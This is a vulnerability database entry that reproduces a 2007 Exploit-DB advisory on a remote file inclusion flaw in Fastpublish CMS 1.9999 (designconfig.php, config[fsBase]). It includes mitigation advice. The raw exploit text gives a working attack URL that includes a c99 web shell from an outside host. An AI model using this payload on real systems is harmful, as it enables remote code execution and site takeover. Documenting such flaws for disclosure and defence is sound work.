Fastpublish CMS 1.9999 (config[fsBase]) Remote File Include

vendor:

Fastpublish CMS

by:

RoMaNcYxHaCkEr

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Fastpublish CMS

Affected Version From: 1.9999

Affected Version To: 1.9999

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Fastpublish CMS 1.9999 (config[fsBase]) Remote File Include

The Fastpublish CMS 1.9999 is vulnerable to remote file inclusion. The vulnerability is present in the designconfig.php file at line 25, where the fsBase parameter is not properly validated before being included in the code. An attacker can exploit this vulnerability by supplying a malicious URL in the fsBase parameter, leading to remote file inclusion.

Mitigation:

To mitigate this vulnerability, it is recommended to properly validate and sanitize user-supplied input before including it in the code. Additionally, keep the CMS software up to date with the latest patches and security fixes.

Source

Exploit-DB raw data:

# Name : Fastpublish CMS 1.9999 (config[fsBase]) Remote File Include
# Download From : http://www.fastpublish.org/aufbau/php_content/downloadlist.php?action=download&id=53&sprache=en
# Found By : RoMaNcYxHaCkEr
# Home Page : Not Yet :(
============================================================================
# Vulne Code In designconfig.php In Line 25 :
@include($config['fsBase']
# Exploit :
www.RxH.com/fastpublish_19999d_trial/adminbereich/designconfig.php?config[fsBase]=http://www.no-hack.fr/shells/c99.txt?

============================================================================
# Greet To :
Cold Z3ro My Master (Hackteach.org)
Hack15 TeaM (V99x.com)
Sniper-Sa (Sniper-sa.com)
Tryag TeaM (Tryag.com)
Yee7 TeaM (Yee7.com)
My5ql Team
Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye , Dr- Wolf4ever And All My Friends
# For Contact : RxH@HotMail.iT
Best Wishes

# milw0rm.com [2007-12-12]